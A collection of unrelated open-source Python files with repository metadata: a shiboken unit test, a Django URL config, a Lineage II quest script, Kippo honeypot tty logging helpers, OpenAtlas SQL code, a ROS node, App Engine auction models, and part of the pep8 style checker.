## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
from __future__ import division
from sample import *
import unittest
class TestNewDivision(unittest.TestCase):
def testIt(self):
p = Point(4, 4)
p2 = p/2
self.assertEqual(p2, Point(2, 2))
if __name__ == "__main__":
unittest.main()
|
qtproject/pyside-shiboken
|
tests/samplebinding/newdivision_test.py
|
Python
|
gpl-2.0
| 1,532
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.core.urlresolvers import reverse
from django.views.generic import TemplateView
from django.views.generic.base import RedirectView
from django.contrib import admin
import os
import logging
logger = logging.getLogger("accountability_tracker")
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
url(r"^admin/doc/", include("django.contrib.admindocs.urls")),
url(r"^admin/", include(admin.site.urls)),
# url pattern to kick root to index of cali_water application
url(r"^monthly-water-use/", include("cali_water.urls")),
# url pattern to kick root to index of election_profiles application
url(r"^2015-la-election-guide/", include("election_profiles.urls")),
# url pattern to kick root to index of see_change application
url(r"^see-change/", include("see_change.urls")),
# url pattern to kick root to index of maplight_finance application
url(r"", include("maplight_finance.urls")),
# batch edit in admin
url(r"^admin/", include("massadmin.urls")),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
if settings.DEBUG and settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
SCPR/accountability-tracker
|
accountability_tracker/urls.py
|
Python
|
gpl-2.0
| 1,388
|
# Maked by Mr. Have fun! Version 0.2
print "importing quests: 169: Nightmare Children"
import sys
from net.sf.l2j.gameserver.model.quest import State
from net.sf.l2j.gameserver.model.quest import QuestState
from net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest
CRACKED_SKULL_ID = 1030
PERFECT_SKULL_ID = 1031
BONE_GAITERS_ID = 31
class Quest (JQuest) :
def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
def onEvent (self,event,st) :
htmltext = event
if event == "1" :
st.set("id","0")
htmltext = "7145-04.htm"
st.set("cond","1")
st.setState(STARTED)
st.playSound("ItemSound.quest_accept")
elif event == "169_1" and int(st.get("onlyone")) == 0 :
if int(st.get("id")) != 169 :
st.set("id","169")
htmltext = "7145-08.htm"
st.giveItems(BONE_GAITERS_ID,1)
st.giveItems(57,17150)
st.takeItems(CRACKED_SKULL_ID,st.getQuestItemsCount(CRACKED_SKULL_ID))
st.takeItems(PERFECT_SKULL_ID,st.getQuestItemsCount(PERFECT_SKULL_ID))
st.set("cond","0")
st.setState(COMPLETED)
st.playSound("ItemSound.quest_finish")
st.set("onlyone","1")
return htmltext
def onTalk (Self,npc,st):
npcId = npc.getNpcId()
htmltext = "<html><head><body>I have nothing to say you</body></html>"
id = st.getState()
if id == CREATED :
st.setState(STARTING)
st.set("cond","0")
st.set("onlyone","0")
st.set("id","0")
if npcId == 7145 and int(st.get("cond"))==0 and int(st.get("onlyone"))==0 :
if int(st.get("cond"))<15 :
if st.getPlayer().getRace().ordinal() != 2 :
htmltext = "7145-00.htm"
elif st.getPlayer().getLevel() >= 15 :
htmltext = "7145-03.htm"
return htmltext
else:
htmltext = "7145-02.htm"
st.exitQuest(1)
else:
htmltext = "7145-02.htm"
st.exitQuest(1)
elif npcId == 7145 and int(st.get("cond"))==0 and int(st.get("onlyone"))==1 :
htmltext = "<html><head><body>This quest have already been completed.</body></html>"
elif npcId == 7145 and int(st.get("cond")) :
if st.getQuestItemsCount(CRACKED_SKULL_ID) >= 1 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
htmltext = "7145-06.htm"
elif st.getQuestItemsCount(PERFECT_SKULL_ID) >= 1 :
htmltext = "7145-07.htm"
elif st.getQuestItemsCount(CRACKED_SKULL_ID) == 0 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
htmltext = "7145-05.htm"
return htmltext
def onKill (self,npc,st):
npcId = npc.getNpcId()
if npcId == 105 :
st.set("id","0")
if int(st.get("cond")) == 1 :
if st.getRandom(10)>7 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
st.giveItems(PERFECT_SKULL_ID,1)
st.playSound("ItemSound.quest_middle")
if st.getRandom(10)>4 :
st.giveItems(CRACKED_SKULL_ID,1)
st.playSound("ItemSound.quest_itemget")
elif npcId == 25 :
st.set("id","0")
if int(st.get("cond")) == 1 :
if st.getRandom(10)>7 and st.getQuestItemsCount(PERFECT_SKULL_ID) == 0 :
st.giveItems(PERFECT_SKULL_ID,1)
st.playSound("ItemSound.quest_middle")
if st.getRandom(10)>4 :
st.giveItems(CRACKED_SKULL_ID,1)
st.playSound("ItemSound.quest_itemget")
return
QUEST = Quest(169,"169_NightmareChildren","Nightmare Children")
CREATED = State('Start', QUEST)
STARTING = State('Starting', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(7145)
STARTING.addTalkId(7145)
STARTED.addTalkId(7145)
STARTED.addKillId(105)
STARTED.addKillId(25)
STARTED.addQuestDrop(105,CRACKED_SKULL_ID,1)
STARTED.addQuestDrop(25,CRACKED_SKULL_ID,1)
STARTED.addQuestDrop(105,PERFECT_SKULL_ID,1)
STARTED.addQuestDrop(25,PERFECT_SKULL_ID,1)
|
Barrog/C4-Datapack
|
data/jscript/quests/169_NightmareChildren/__init__.py
|
Python
|
gpl-2.0
| 3,977
|
# Copyright (c) 2009 Upi Tamminen <desaster@gmail.com>
# See the COPYRIGHT file for more information
# Should be compatible with user mode linux
import struct, sys
OP_OPEN, OP_CLOSE, OP_WRITE, OP_EXEC = 1, 2, 3, 4
TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT = 1, 2, 3
def ttylog_write(logfile, len, direction, stamp, data = None):
f = file(logfile, 'ab')
sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
f.write(struct.pack('<iLiiLL', 3, 0, len, direction, sec, usec))
f.write(data)
f.close()
def ttylog_open(logfile, stamp):
f = file(logfile, 'ab')
sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
f.write(struct.pack('<iLiiLL', 1, 0, 0, 0, sec, usec))
f.close()
def ttylog_close(logfile, stamp):
f = file(logfile, 'ab')
sec, usec = int(stamp), int(1000000 * (stamp - int(stamp)))
f.write(struct.pack('<iLiiLL', 2, 0, 0, 0, sec, usec))
f.close()
# vim: set sw=4 et:
|
jullrich/dshieldhoneypot
|
kippo/kippo-0.8/kippo/core/ttylog.py
|
Python
|
gpl-2.0
| 943
|
from typing import Any
from flask import g
class ReferenceSystem:
@staticmethod
def get_all() -> list[dict[str, Any]]:
g.cursor.execute("""
SELECT
e.id, e.name,
e.cidoc_class_code,
e.description,
e.openatlas_class_name,
e.created,
e.modified,
rs.website_url,
rs.resolver_url,
rs.identifier_example,
rs.system,
COUNT(l.id) AS count,
array_to_json(
array_agg((t.range_id, t.description))
FILTER (WHERE t.range_id IS NOT NULL)
) AS types
FROM model.entity e
JOIN web.reference_system rs ON e.id = rs.entity_id
LEFT JOIN model.link l ON e.id = l.domain_id
AND l.property_code = 'P67'
LEFT JOIN model.link t ON e.id = t.domain_id
AND t.property_code = 'P2'
GROUP BY
e.id,
e.name,
e.cidoc_class_code,
e.description,
e.openatlas_class_name,
e.created,
e.modified,
rs.website_url,
rs.resolver_url,
rs.identifier_example,
rs.system, rs.entity_id;""")
return [dict(row) for row in g.cursor.fetchall()]
@staticmethod
def add_classes(entity_id: int, class_names: list[str]) -> None:
for name in class_names:
g.cursor.execute(
"""
INSERT INTO web.reference_system_openatlas_class (
reference_system_id, openatlas_class_name)
VALUES (%(entity_id)s, %(name)s);""",
{'entity_id': entity_id, 'name': name})
@staticmethod
def remove_class(entity_id: int, class_name: str) -> None:
g.cursor.execute(
"""
DELETE FROM web.reference_system_openatlas_class
WHERE reference_system_id = %(reference_system_id)s
AND openatlas_class_name = %(class_name)s;""",
{'reference_system_id': entity_id, 'class_name': class_name})
@staticmethod
def update_system(data: dict[str, Any]) -> None:
g.cursor.execute("""
UPDATE web.reference_system
SET (name, website_url, resolver_url, identifier_example)
= (
%(name)s,
%(website_url)s,
%(resolver_url)s,
%(identifier_example)s)
WHERE entity_id = %(entity_id)s;""", data)
@staticmethod
def insert_system(data: dict[str, Any]) -> None:
g.cursor.execute(
"""
INSERT INTO web.reference_system (
entity_id, name, website_url, resolver_url)
VALUES (
%(entity_id)s, %(name)s, %(website_url)s, %(resolver_url)s);""",
data)
@staticmethod
def delete_links_from_entity(entity_id: int) -> None:
g.cursor.execute(
"""
DELETE FROM model.link l
WHERE property_code = 'P67'
AND domain_id IN %(systems_ids)s
AND range_id = %(entity_id)s;""",
{
'systems_ids': tuple(g.reference_systems.keys()),
'entity_id': entity_id})
|
craws/OpenAtlas
|
openatlas/database/reference_system.py
|
Python
|
gpl-2.0
| 3,447
|
#!/usr/bin/env python
import roslib; roslib.load_manifest("gki_sickrd_task")
import rospy
import math
import threading
from gki_sickrd_task.estop_guard import EstopGuard
from gki_sickrd_task.params import Params
from std_msgs.msg import Float32
class WorldmodelAgeing(object):
def __init__(self):
self.worldmodel_ageing_publisher = rospy.Publisher('/worldmodel/object_ageing', Float32)
self.stop = False
self.last_ageing = rospy.Time.now()
rospy.Timer(rospy.Duration(1.0), self.ageing_cb)
EstopGuard.add_callback(self.estop_changed_cb)
def estop_changed_cb(self, stop):
self.stop = stop
def ageing_cb(self, event):
if not self.stop:
self.worldmodel_ageing_publisher.publish(Float32(data=Params().worldmodel_ageing_rate))
if __name__ == "__main__":
rospy.init_node("worldmodel_ageing")
ageing = WorldmodelAgeing()
rospy.spin()
|
GKIFreiburg/gki_sickrd2014
|
gki_sickrd_task/scripts/worldmodel_ageing.py
|
Python
|
gpl-2.0
| 856
|
__all__ = [
AttributeAuction,
RankedAuction,
Round,
WinnerTakesAllAuction,
]
from google.appengine.ext import ndb
from google.appengine.ext.ndb import polymodel
from .thronewar import ThroneWar
class Round(ndb.Model):
"""
An auction round in the throne war. A throne war may have multiple
auction rounds, resulting in only some things being bidded on at a given
time.
"""
thronewar = ndb.KeyProperty(kind=ThroneWar, collection_name='rounds')
order = ndb.IntegerProperty(default=0)
class Auction(polymodel.PolyModel):
"""
An auction within a round
"""
bid_round = ndb.KeyProperty(kind=Round, collection_name='auctions')
name = ndb.StringProperty()
description = ndb.TextProperty()
default_bid = ndb.IntegerProperty(default=0)
min_initial_bid = ndb.IntegerProperty(default=0)
max_initial_bid = ndb.IntegerProperty(default=0)
@property
def ranked(self):
"""
Return bids in ranked order.
"""
return sorted(
filter(
lambda bid: bid.locked_bid > 0,
self.bids
),
key=operator.attrgetter('locked_bid'),
reverse=True
)
@property
def unranked(self):
"""
Return all unranked bids.
"""
return filter(
lambda bid: bid.locked_bid == 0,
self.bids
)
class AttributeAuction(Auction):
"""
An attribute auction -- ie this can be sold down
"""
selldown_rungs = ndb.ListProperty(int, default=[-25, -10])
selldown_names = ndb.StringListProperty(default=['human', 'chaos'])
# TODO allow bidding down if the locked_bid is 0.
@property
def unranked(self):
"""
Sell-downs are secret.
"""
return filter(
lambda bid: bid.locked_bid <= 0,
self.bids
)
class RankedAuction(Auction):
"""
A power auction -- ie this can't be sold down
"""
virtual_rungs = ndb.ListProperty(int)
class WinnerTakesAllAuction(Auction):
"""
A winner-takes-all auction -- ie, auctioning off the captain of the
castle guard position.
"""
@property
def ranked(self):
"""
Only the highest bid counts.
"""
return sorted(
self.bids,
key=operator.attrgetter('locked_bid'),
reverse=True
)[:1]
@property
def unranked(self):
return sorted(
self.bids,
key=operator.attrgetter('locked_bid'),
reverse=True
)[1:]
|
svirpridon/labordaythronewar
|
models/auctions.py
|
Python
|
gpl-3.0
| 2,613
|
#!/usr/bin/env python
# pep8.py - Check Python source code formatting, according to PEP 8
# Copyright (C) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
# Copyright (C) 2009-2014 Florent Xicluna <florent.xicluna@gmail.com>
# Copyright (C) 2014 Ian Lee <ianlee1521@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
r"""
Check Python source code formatting, according to PEP 8.
For usage and a list of options, try this:
$ python pep8.py -h
This program and its regression test suite live here:
http://github.com/jcrocholl/pep8
Groups of errors and warnings:
E errors
W warnings
100 indentation
200 whitespace
300 blank lines
400 imports
500 line length
600 deprecation
700 statements
900 syntax error
"""
from __future__ import with_statement
import os
import sys
import re
import time
import inspect
import keyword
import tokenize
from optparse import OptionParser
from fnmatch import fnmatch
try:
from configparser import RawConfigParser
from io import TextIOWrapper
except ImportError:
from ConfigParser import RawConfigParser
__version__ = '1.6.0a0'
DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__,.tox'
DEFAULT_IGNORE = 'E121,E123,E126,E226,E24,E704'
try:
if sys.platform == 'win32':
DEFAULT_CONFIG = os.path.expanduser(r'~\.pep8')
else:
DEFAULT_CONFIG = os.path.join(os.getenv('XDG_CONFIG_HOME') or
os.path.expanduser('~/.config'), 'pep8')
except ImportError:
DEFAULT_CONFIG = None
PROJECT_CONFIG = ('setup.cfg', 'tox.ini', '.pep8')
TESTSUITE_PATH = os.path.join(os.path.dirname(__file__), 'testsuite')
MAX_LINE_LENGTH = 150
REPORT_FORMAT = {
'default': '%(path)s:%(row)d:%(col)d: %(code)s %(text)s',
'pylint': '%(path)s:%(row)d: [%(code)s] %(text)s',
}
PyCF_ONLY_AST = 1024
SINGLETONS = frozenset(['False', 'None', 'True'])
KEYWORDS = frozenset(keyword.kwlist + ['print']) - SINGLETONS
UNARY_OPERATORS = frozenset(['>>', '**', '*', '+', '-'])
ARITHMETIC_OP = frozenset(['**', '*', '/', '//', '+', '-'])
WS_OPTIONAL_OPERATORS = ARITHMETIC_OP.union(['^', '&', '|', '<<', '>>', '%'])
WS_NEEDED_OPERATORS = frozenset([
'**=', '*=', '/=', '//=', '+=', '-=', '!=', '<>', '<', '>',
'%=', '^=', '&=', '|=', '==', '<=', '>=', '<<=', '>>=', '='])
WHITESPACE = frozenset(' \t')
NEWLINE = frozenset([tokenize.NL, tokenize.NEWLINE])
SKIP_TOKENS = NEWLINE.union([tokenize.INDENT, tokenize.DEDENT])
# ERRORTOKEN is triggered by backticks in Python 3
SKIP_COMMENTS = SKIP_TOKENS.union([tokenize.COMMENT, tokenize.ERRORTOKEN])
BENCHMARK_KEYS = ['directories', 'files', 'logical lines', 'physical lines']
INDENT_REGEX = re.compile(r'([ \t]*)')
RAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,')
RERAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,.*,\s*\w+\s*$')
ERRORCODE_REGEX = re.compile(r'\b[A-Z]\d{3}\b')
DOCSTRING_REGEX = re.compile(r'u?r?["\']')
EXTRANEOUS_WHITESPACE_REGEX = re.compile(r'[[({] | []}),;:]')
WHITESPACE_AFTER_COMMA_REGEX = re.compile(r'[,;:]\s*(?: |\t)')
COMPARE_SINGLETON_REGEX = re.compile(r'\b(None|False|True)?\s*([=!]=)'
r'\s*(?(1)|(None|False|True))\b')
COMPARE_NEGATIVE_REGEX = re.compile(r'\b(not)\s+[^][)(}{ ]+\s+(in|is)\s')
COMPARE_TYPE_REGEX = re.compile(r'(?:[=!]=|is(?:\s+not)?)\s*type(?:s.\w+Type'
r'|\s*\(\s*([^)]*[^ )])\s*\))')
KEYWORD_REGEX = re.compile(r'(\s*)\b(?:%s)\b(\s*)' % r'|'.join(KEYWORDS))
OPERATOR_REGEX = re.compile(r'(?:[^,\s])(\s*)(?:[-+*/|!<=>%&^]+)(\s*)')
LAMBDA_REGEX = re.compile(r'\blambda\b')
HUNK_REGEX = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@.*$')
# Work around Python < 2.6 behaviour, which does not generate NL after
# a comment which is on a line by itself.
COMMENT_WITH_NL = tokenize.generate_tokens(['#\n'].pop).send(None)[1] == '#\n'
##############################################################################
# Plugins (check functions) for physical lines
##############################################################################
def tabs_or_spaces(physical_line, indent_char):
r"""Never mix tabs and spaces.
The most popular way of indenting Python is with spaces only. The
second-most popular way is with tabs only. Code indented with a mixture
of tabs and spaces should be converted to using spaces exclusively. When
invoking the Python command line interpreter with the -t option, it issues
warnings about code that illegally mixes tabs and spaces. When using -tt
these warnings become errors. These options are highly recommended!
Okay: if a == 0:\n a = 1\n b = 1
E101: if a == 0:\n a = 1\n\tb = 1
"""
indent = INDENT_REGEX.match(physical_line).group(1)
for offset, char in enumerate(indent):
if char != indent_char:
return offset, "E101 indentation contains mixed spaces and tabs"
def tabs_obsolete(physical_line):
r"""For new projects, spaces-only are strongly recommended over tabs.
Okay: if True:\n return
W191: if True:\n\treturn
"""
indent = INDENT_REGEX.match(physical_line).group(1)
if '\t' in indent:
return indent.index('\t'), "W191 indentation contains tabs"
def trailing_whitespace(physical_line):
r"""Trailing whitespace is superfluous.
The warning returned varies on whether the line itself is blank, for easier
filtering for those who want to indent their blank lines.
Okay: spam(1)\n#
W291: spam(1) \n#
W293: class Foo(object):\n \n bang = 12
"""
physical_line = physical_line.rstrip('\n') # chr(10), newline
physical_line = physical_line.rstrip('\r') # chr(13), carriage return
physical_line = physical_line.rstrip('\x0c') # chr(12), form feed, ^L
stripped = physical_line.rstrip(' \t\v')
if physical_line != stripped:
if stripped:
return len(stripped), "W291 trailing whitespace"
else:
return 0, "W293 blank line contains whitespace"
def trailing_blank_lines(physical_line, lines, line_number, total_lines):
r"""Trailing blank lines are superfluous.
Okay: spam(1)
W391: spam(1)\n
However the last line should end with a new line (warning W292).
"""
if line_number == total_lines:
stripped_last_line = physical_line.rstrip()
if not stripped_last_line:
return 0, "W391 blank line at end of file"
if stripped_last_line == physical_line:
return len(physical_line), "W292 no newline at end of file"
def maximum_line_length(physical_line, max_line_length, multiline):
r"""Limit all lines to a maximum of 79 characters.
There are still many devices around that are limited to 80 character
lines; plus, limiting windows to 80 characters makes it possible to have
several windows side-by-side. The default wrapping on such devices looks
ugly. Therefore, please limit all lines to a maximum of 79 characters.
For flowing long blocks of text (docstrings or comments), limiting the
length to 72 characters is recommended.
Reports error E501.
"""
line = physical_line.rstrip()
length = len(line)
if length > max_line_length and not noqa(line):
# Special case for long URLs in multi-line docstrings or comments,
# but still report the error when the 72 first chars are whitespaces.
chunks = line.split()
if ((len(chunks) == 1 and multiline) or
(len(chunks) == 2 and chunks[0] == '#')) and \
len(line) - len(chunks[-1]) < max_line_length - 7:
return
if hasattr(line, 'decode'): # Python 2
# The line could contain multi-byte characters
try:
length = len(line.decode('utf-8'))
except UnicodeError:
pass
if length > max_line_length:
return (max_line_length, "E501 line too long "
"(%d > %d characters)" % (length, max_line_length))
##############################################################################
# Plugins (check functions) for logical lines
##############################################################################
def blank_lines(logical_line, blank_lines, indent_level, line_number,
blank_before, previous_logical, previous_indent_level):
r"""Separate top-level function and class definitions with two blank lines.
Method definitions inside a class are separated by a single blank line.
Extra blank lines may be used (sparingly) to separate groups of related
functions. Blank lines may be omitted between a bunch of related
one-liners (e.g. a set of dummy implementations).
Use blank lines in functions, sparingly, to indicate logical sections.
Okay: def a():\n pass\n\n\ndef b():\n pass
Okay: def a():\n pass\n\n\n# Foo\n# Bar\n\ndef b():\n pass
E301: class Foo:\n b = 0\n def bar():\n pass
E302: def a():\n pass\n\ndef b(n):\n pass
E303: def a():\n pass\n\n\n\ndef b(n):\n pass
E303: def a():\n\n\n\n pass
E304: @decorator\n\ndef a():\n pass
"""
if line_number < 3 and not previous_logical:
return # Don't expect blank lines before the first line
if previous_logical.startswith('@'):
if blank_lines:
yield 0, "E304 blank lines found after function decorator"
elif blank_lines > 2 or (indent_level and blank_lines == 2):
yield 0, "E303 too many blank lines (%d)" % blank_lines
elif logical_line.startswith(('def ', 'class ', '@')):
if indent_level:
if not (blank_before or previous_indent_level < indent_level or
DOCSTRING_REGEX.match(previous_logical)):
yield 0, "E301 expected 1 blank line, found 0"
elif blank_before != 2:
yield 0, "E302 expected 2 blank lines, found %d" % blank_before
def extraneous_whitespace(logical_line):
r"""Avoid extraneous whitespace.
Avoid extraneous whitespace in these situations:
- Immediately inside parentheses, brackets or braces.
- Immediately before a comma, semicolon, or colon.
Okay: spam(ham[1], {eggs: 2})
E201: spam( ham[1], {eggs: 2})
E201: spam(ham[ 1], {eggs: 2})
E201: spam(ham[1], { eggs: 2})
E202: spam(ham[1], {eggs: 2} )
E202: spam(ham[1 ], {eggs: 2})
E202: spam(ham[1], {eggs: 2 })
E203: if x == 4: print x, y; x, y = y , x
E203: if x == 4: print x, y ; x, y = y, x
E203: if x == 4 : print x, y; x, y = y, x
"""
line = logical_line
for match in EXTRANEOUS_WHITESPACE_REGEX.finditer(line):
text = match.group()
char = text.strip()
found = match.start()
if text == char + ' ':
# assert char in '([{'
yield found + 1, "E201 whitespace after '%s'" % char
elif line[found - 1] != ',':
code = ('E202' if char in '}])' else 'E203') # if char in ',;:'
yield found, "%s whitespace before '%s'" % (code, char)
def whitespace_around_keywords(logical_line):
r"""Avoid extraneous whitespace around keywords.
Okay: True and False
E271: True and False
E272: True and False
E273: True and\tFalse
E274: True\tand False
"""
for match in KEYWORD_REGEX.finditer(logical_line):
before, after = match.groups()
if '\t' in before:
yield match.start(1), "E274 tab before keyword"
elif len(before) > 1:
yield match.start(1), "E272 multiple spaces before keyword"
if '\t' in after:
yield match.start(2), "E273 tab after keyword"
elif len(after) > 1:
yield match.start(2), "E271 multiple spaces after keyword"
def missing_whitespace(logical_line):
r"""Each comma, semicolon or colon should be followed by whitespace.
Okay: [a, b]
Okay: (3,)
Okay: a[1:4]
Okay: a[:4]
Okay: a[1:]
Okay: a[1:4:2]
E231: ['a','b']
E231: foo(bar,baz)
E231: [{'a':'b'}]
"""
line = logical_line
for index in range(len(line) - 1):
char = line[index]
if char in ',;:' and line[index + 1] not in WHITESPACE:
before = line[:index]
if char == ':' and before.count('[') > before.count(']') and \
before.rfind('{') < before.rfind('['):
continue # Slice syntax, no space required
if char == ',' and line[index + 1] == ')':
continue # Allow tuple with only one element: (3,)
yield index, "E231 missing whitespace after '%s'" % char
def indentation(logical_line, previous_logical, indent_char,
indent_level, previous_indent_level):
r"""Use 4 spaces per indentation level.
For really old code that you don't want to mess up, you can continue to
use 8-space tabs.
Okay: a = 1
Okay: if a == 0:\n a = 1
E111: a = 1
E114: # a = 1
Okay: for item in items:\n pass
E112: for item in items:\npass
E115: for item in items:\n# Hi\n pass
Okay: a = 1\nb = 2
E113: a = 1\n b = 2
E116: a = 1\n # b = 2
"""
c = 0 if logical_line else 3
tmpl = "E11%d %s" if logical_line else "E11%d %s (comment)"
if indent_level % 4:
yield 0, tmpl % (1 + c, "indentation is not a multiple of four")
indent_expect = previous_logical.endswith(':')
if indent_expect and indent_level <= previous_indent_level:
yield 0, tmpl % (2 + c, "expected an indented block")
elif not indent_expect and indent_level > previous_indent_level:
yield 0, tmpl % (3 + c, "unexpected indentation")
def continued_indentation(logical_line, tokens, indent_level, hang_closing,
indent_char, noqa, verbose):
r"""Continuation lines indentation.
Continuation lines should align wrapped elements either vertically
using Python's implicit line joining inside parentheses, brackets
and braces, or using a hanging indent.
When using a hanging indent these considerations should be applied:
- there should be no arguments on the first line, and
- further indentation should be used to clearly distinguish itself as a
continuation line.
Okay: a = (\n)
E123: a = (\n )
Okay: a = (\n 42)
E121: a = (\n 42)
E122: a = (\n42)
E123: a = (\n 42\n )
E124: a = (24,\n 42\n)
E125: if (\n b):\n pass
E126: a = (\n 42)
E127: a = (24,\n 42)
E128: a = (24,\n 42)
E129: if (a or\n b):\n pass
E131: a = (\n 42\n 24)
"""
first_row = tokens[0][2][0]
nrows = 1 + tokens[-1][2][0] - first_row
if noqa or nrows == 1:
return
# indent_next tells us whether the next block is indented; assuming
# that it is indented by 4 spaces, then we should not allow 4-space
# indents on the final continuation line; in turn, some other
# indents are allowed to have an extra 4 spaces.
indent_next = logical_line.endswith(':')
row = depth = 0
valid_hangs = (4,) if indent_char != '\t' else (4, 8)
# remember how many brackets were opened on each line
parens = [0] * nrows
# relative indents of physical lines
rel_indent = [0] * nrows
# for each depth, collect a list of opening rows
open_rows = [[0]]
# for each depth, memorize the hanging indentation
hangs = [None]
# visual indents
indent_chances = {}
last_indent = tokens[0][2]
visual_indent = None
# for each depth, memorize the visual indent column
indent = [last_indent[1]]
if verbose >= 3:
print(">>> " + tokens[0][4].rstrip())
for token_type, text, start, end, line in tokens:
newline = row < start[0] - first_row
if newline:
row = start[0] - first_row
newline = not last_token_multiline and token_type not in NEWLINE
if newline:
# this is the beginning of a continuation line.
last_indent = start
if verbose >= 3:
print("... " + line.rstrip())
# record the initial indent.
rel_indent[row] = expand_indent(line) - indent_level
# identify closing bracket
close_bracket = (token_type == tokenize.OP and text in ']})')
# is the indent relative to an opening bracket line?
for open_row in reversed(open_rows[depth]):
hang = rel_indent[row] - rel_indent[open_row]
hanging_indent = hang in valid_hangs
if hanging_indent:
break
if hangs[depth]:
hanging_indent = (hang == hangs[depth])
# is there any chance of visual indent?
visual_indent = (not close_bracket and hang > 0 and
indent_chances.get(start[1]))
if close_bracket and indent[depth]:
# closing bracket for visual indent
if start[1] != indent[depth]:
yield (start, "E124 closing bracket does not match "
"visual indentation")
elif close_bracket and not hang:
# closing bracket matches indentation of opening bracket's line
if hang_closing:
yield start, "E133 closing bracket is missing indentation"
elif indent[depth] and start[1] < indent[depth]:
if visual_indent is not True:
# visual indent is broken
yield (start, "E128 continuation line "
"under-indented for visual indent")
elif hanging_indent or (indent_next and rel_indent[row] == 8):
# hanging indent is verified
if close_bracket and not hang_closing:
yield (start, "E123 closing bracket does not match "
"indentation of opening bracket's line")
hangs[depth] = hang
elif visual_indent is True:
# visual indent is verified
indent[depth] = start[1]
elif visual_indent in (text, str):
# ignore token lined up with matching one from a previous line
pass
else:
# indent is broken
if hang <= 0:
error = "E122", "missing indentation or outdented"
elif indent[depth]:
error = "E127", "over-indented for visual indent"
elif not close_bracket and hangs[depth]:
error = "E131", "unaligned for hanging indent"
else:
hangs[depth] = hang
if hang > 4:
error = "E126", "over-indented for hanging indent"
else:
error = "E121", "under-indented for hanging indent"
yield start, "%s continuation line %s" % error
# look for visual indenting
if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
and not indent[depth]):
indent[depth] = start[1]
indent_chances[start[1]] = True
if verbose >= 4:
print("bracket depth %s indent to %s" % (depth, start[1]))
# deal with implicit string concatenation
elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
text in ('u', 'ur', 'b', 'br')):
indent_chances[start[1]] = str
# special case for the "if" statement because len("if (") == 4
elif not indent_chances and not row and not depth and text == 'if':
indent_chances[end[1] + 1] = True
elif text == ':' and line[end[1]:].isspace():
open_rows[depth].append(row)
# keep track of bracket depth
if token_type == tokenize.OP:
if text in '([{':
depth += 1
indent.append(0)
hangs.append(None)
if len(open_rows) == depth:
open_rows.append([])
open_rows[depth].append(row)
parens[row] += 1
if verbose >= 4:
print("bracket depth %s seen, col %s, visual min = %s" %
(depth, start[1], indent[depth]))
elif text in ')]}' and depth > 0:
# parent indents should not be more than this one
prev_indent = indent.pop() or last_indent[1]
hangs.pop()
for d in range(depth):
if indent[d] > prev_indent:
indent[d] = 0
for ind in list(indent_chances):
if ind >= prev_indent:
del indent_chances[ind]
del open_rows[depth + 1:]
depth -= 1
if depth:
indent_chances[indent[depth]] = True
for idx in range(row, -1, -1):
if parens[idx]:
parens[idx] -= 1
break
assert len(indent) == depth + 1
if start[1] not in indent_chances:
# allow to line up tokens
indent_chances[start[1]] = text
last_token_multiline = (start[0] != end[0])
if last_token_multiline:
rel_indent[end[0] - first_row] = rel_indent[row]
if indent_next and expand_indent(line) == indent_level + 4:
pos = (start[0], indent[0] + 4)
if visual_indent:
code = "E129 visually indented line"
else:
code = "E125 continuation line"
yield pos, "%s with same indent as next logical line" % code
def whitespace_before_parameters(logical_line, tokens):
r"""Avoid extraneous whitespace.
Avoid extraneous whitespace in the following situations:
- before the open parenthesis that starts the argument list of a
function call.
- before the open parenthesis that starts an indexing or slicing.
Okay: spam(1)
E211: spam (1)
Okay: dict['key'] = list[index]
E211: dict ['key'] = list[index]
E211: dict['key'] = list [index]
"""
prev_type, prev_text, __, prev_end, __ = tokens[0]
for index in range(1, len(tokens)):
token_type, text, start, end, __ = tokens[index]
if (token_type == tokenize.OP and
